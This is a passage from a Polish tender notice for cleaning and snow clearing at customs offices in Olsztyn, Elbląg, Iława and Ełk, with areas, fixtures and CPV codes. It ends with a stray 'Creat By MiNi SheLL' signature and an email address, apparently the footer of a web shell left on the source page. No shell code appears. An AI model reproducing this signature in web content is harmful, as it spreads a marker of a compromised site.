-1631 m2 (budynek Urzędu/Oddziału Celnego przy ul. Składowej 5) - dwupiętrowy budynek biurowy z dużą powierzchnią przeszklenia (122 okna + witryna), z pomieszczeniami biurowymi, zapleczem socjalnym i higieniczno - sanitarnym oraz dużą powierzchnią archiwalną; umycie szyb (jednorazowo - powierzchnia przeszklenia 164 m2)
-85,60 m2 - pomieszczenia biurowe wynajmowane od Centrum Motoryzacyjnego (pok. nr 4 i 5 na parterze budynku zlokalizowanego przy ul. Składowej 5 - bez toalet i ciągów komunikacyjnych) - umycie szyb (jednorazowo - powierzchnia przeszklenia 14 m2 ). 
Powierzchnia przeszkleń/okien do mycia - podawana jednostronnie: ok. 178 m2 
Powierzchnia drzwi do mycia - podawana jednostronnie: ok. 219 m2 
Podłogi: terakota/beton - ok. 1230 m2, pcv - ok.317 m2.
Wykładzina dywanowa: ok. 170 m2
Ilość umywalek - 14 szt.
Ilość sedesów -  11 szt.
Ilość pisuarów -  3 szt.
Ilość zlewów met. / zlewozmywaków - 4 szt.
Ilość osób pracujących w budynku : ok. 126
POWIERZCHNIA WEWNĘTRZNA POZOSTAŁA: 
Na terenie należącym do Urzędu Celnego znajduje się również budynek kontroli szczegółowej oraz budynek magazynowy, w których należy wykonywać dodatkowe prace okresowe:
- dwa razy w tygodniu sprzątanie zaplecza sanitarnego, w tym:
-pow. podłóg - 45  m2,
-ilość umywalek  - 6 szt.
-ilość sedesów - 4 szt.
-ilość pisuarów - 4 szt.
-ilość kabin prysznicowych - 1 szt.  
- raz w roku (w kwietniu) umycie szyb, z powierzchnią przeszklenia 161 m2, 
- raz na kwartał sprzątanie (zamiatanie) powierzchni wewnętrznej 852 m2 . 
Koszty sprzątania powierzchni wewnętrznej pozostałej powinny być wliczone w cenę sprzątania  pomieszczeń biurowych Urzędu i Oddziału Celnego w Olsztynie oraz pomieszczeń wynajmowanych. 
Powierzchnia zewnętrzna posesji wynosi 13507 m2- na posesji znajdują się: budynek biurowy Urzędu i Oddziału Celnego, budynek kontroli szczegółowej oraz budynek garażowy (8 boksów), magazynowy, zadaszony śmietnik, przenośna kabina sanitarna, parkingi samochodów ciężarowych i osobowych, chodniki, droga dojazdowa oraz teren zielony około 925 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 90.62.00.00-0, 39.80.00.00-0, 33.76.00.00-5, 33.71.19.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> pomieszczenia i plac Urzędu i Oddziału Celnego w Elblągu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług:
1)	utrzymania czystości wewnątrz budynków Urzędu/Oddziału Celnego w Elblągu, zlokalizowanych w Elblągu przy ul. Warszawskiej 129A;
2)	utrzymania czystości na posesji, placu odpraw, parkingu i pasie zieleni, usytuowanych w sąsiedztwie budynku, o którym mowa w pkt 1);
3)	odśnieżania w okresie zimowym wraz z posypywaniem piachem, solą/mieszanką posesji, placu odpraw, parkingu, usytuowanych w sąsiedztwie budynku, o którym mowa w pkt 1).
Charakterystyka budynków:
Dwa budynki biurowe o łącznej powierzchni użytkowej 1110,44 m2, z czego jeden budynek dwukondygnacyjny z pomieszczeniami biurowymi i zapleczem socjalnym i higieniczno - sanitarnym oraz archiwum, dużą powierzchnią przeszkloną (ogółem 84 okna i 5 par drzwi wewn.), drugi budynek parterowy z pomieszczeniami biurowymi , zapleczem i archiwum, dużą powierzchnią przeszkloną ( ogółem 20 okien i 4 pary drzwi). 
Powierzchnia przeszkleń/okien do mycia - podawana jednostronnie: ok. 93 m2 
Powierzchnia drzwi do mycia - podawana jednostronnie: ok. 118 m2 
Podłogi: terakota/beton - ok. 437 m2, pcv - ok. 656 m2.
Wykładzina dywanowa: ok. 100 m2
Ilość umywalek - 17 szt.
Ilość sedesów -  16 szt.
Ilość pisuarów -  6 szt.
Ilość kabin prysznicowych - 3 szt.
Ilość zlewów met. / zlewozmywaków - 2 szt.
Ilość osób pracujących w budynku : ok. 110

Na terenie należącym do Urzędu Celnego znajduje się również budynek kontroli szczegółowej, w którym należy wykonywać dodatkowe prace okresowe:
- raz w roku umycie szyb, z powierzchnią przeszklenia 28,8 m2, 
- raz na kwartał sprzątanie / czyszczenie powierzchni wewnętrznej 894,5 m2 . 
Koszty sprzątania raz na kwartał budynku kontroli szczegółowej oraz mycia okien raz w roku powinny być wliczone w cenę sprzątania pomieszczeń i placu Urzędu i Oddziału Celnego w Elblągu. 
POWIERZCHNIA ZEWNĘTRZNA
Wielkość powierzchni zewnętrznej wynosi 13934,41 m2 - chodniki, utwardzony plac odpraw wraz z drogami komunikacyjnymi i rampą oraz tereny zielone około 7800 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 90.62.00.00-0, 39.80.00.00-0, 33.76.00.00-5, 33.71.19.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> pomieszczenia i plac Oddziału Celnego w Iławie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia świadczenie usług:
1)utrzymania czystości wewnątrz budynku Oddziału Celnego w Iławie, zlokalizowanego w Iławie przy ul. Lubawskiej 12;
2)utrzymania czystości na posesji, placu odpraw, parkingu i pasie zieleni zlokalizowanych 
w sąsiedztwie budynku o którym mowa w pkt 1);
3)odśnieżania w okresie zimowym wraz z posypywaniem piachem, solą/mieszanką posesji, placu odpraw, parkingu, usytuowanych w sąsiedztwie budynku, o którym mowa w pkt 1);
Wielkość powierzchni wewnętrznej wynosi 1035 m2. Jest to budynek biurowy IV kondygnacyjny, podpiwniczony, o zwartej bryle, ocieplony z dachem płaskim. Wysokość pomieszczeń standardowa. W  piwnicy o pow. ok 254 m2 znajdują się: pom. techniczne, archiwum (składnica akt - 82,16 m2), magazyn na narzędzia, pom. do pobierania próbek oraz  magazyn depozytowy o pow. ok. 90 m2 , w tym cały korytarz - 43 m2. W piwnicy znajduje się również toaleta, którą należy sprzątać co drugi dzień - 6,4 m2. Na II piętrze znajduje się sala narad o powierzchni 50,56 m2. W pozostałej części budynku znajdują się pomieszczenia biurowe z zapleczem higieniczno - sanitarnym/socjalnym. 
Charakterystyka:
Powierzchnia przeszkleń/okien do mycia - podawana jednostronnie: ok. 184 m2
Powierzchnia drzwi do mycia - podawana jednostronnie: ok. 124 m2
Podłogi: terakota/beton - ok. 664 m2, pcv - ok. 175 m2.
Wykładzina dywanowa/dywany: ok. 197 m2
Ilość umywalek - 13 szt.
Ilość sedesów -  13 szt.
Ilość pisuarów -  3 szt.
Ilość kabin prysznicowych: 4 szt.
Ilość zlewów met. / zlewozmywaków - 2 szt.
Ilość osób pracujących w budynku : ok. 40
Na terenie należącym do Oddziału Celnego znajduje się również budynek kontroli szczegółowej, 
w którym należy wykonywać dodatkowe prace okresowe:
- raz w roku umycie szyb, z powierzchnią przeszklenia 10,6 m2, 
- raz na kwartał sprzątanie / czyszczenie powierzchni wewnętrznej 332,6 m2 . 
Koszty sprzątania raz na kwartał budynku kontroli szczegółowej oraz mycia okien raz w roku powinny być wliczone w cenę sprzątania pomieszczeń i posesji Oddziału Celnego w Iławie. 
Powierzchnia zewnętrzna posesji wynosi 7064 m2 - składają się na nią chodniki, utwardzony plac odpraw wraz z drogami komunikacyjnymi oraz tereny zielone około 1944 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 90.62.00.00-0, 39.80.00.00-0, 33.76.00.00-5, 33.71.90.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> pomieszczenia i plac Oddziału Celnego w Ełku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług:
1)	utrzymania czystości wewnątrz budynków Oddziału Celnego w Ełku zlokalizowanego przy 
ul. Przemysłowej 10 w Ełku;
2)	utrzymania czystości na posesji, placu odpraw, parkingu i pasie zieleni, usytuowanych w sąsiedztwie budynku, o którym mowa w pkt 1);
3)	odśnieżania w okresie zimowym wraz z posypywaniem piachem, solą/mieszanką chodników, placu odpraw i parkingu, usytuowanych w sąsiedztwie budynku, o którym mowa w pkt 1).
Charakterystyka budynku:
Wielkość powierzchni wewnętrznej wynosi 784 m2. Budynek jest podpiwniczony, z wysokim parterem i piętrem. Pomieszczenia piwniczne częściowo wykorzystywane są na zaplecze gospodarcze i archiwum - ich sprzątanie odbywać się będzie okresowo. W pozostałej części budynku znajdują się pomieszczenia biurowe z zapleczem higieniczno - sanitarnym/socjalnym. 
Charakterystyka:
Powierzchnia przeszkleń do mycia - podawana jednostronnie: 145,2 m2 (w tym 133 okna)
Powierzchnia drzwi do mycia - podawana jednostronnie: ok. 96 m2 (57 drzwi)
Podłogi: 100 % terakota
Ilość umywalek - 8 szt.
Ilość sedesów -  6 szt.
Ilość pisuarów -  2 szt.
Ilość zlewów met / zlewozmywaków - 1 szt.
Ilość osób pracujących w budynku : ok. 30
POWIERZCHNIA ZEWNĘTRZNA
Wielkość powierzchni zewnętrznej wynosi 3430 m2 (w tym ok. 90% to teren utwardzony), na którą składa się plac odpraw, tereny zielone około 578 m2 , parking samochodów osobowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 90.62.00.00-0, 39.80.00.00-0, 33.76.00.00-5, 33.71.19.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com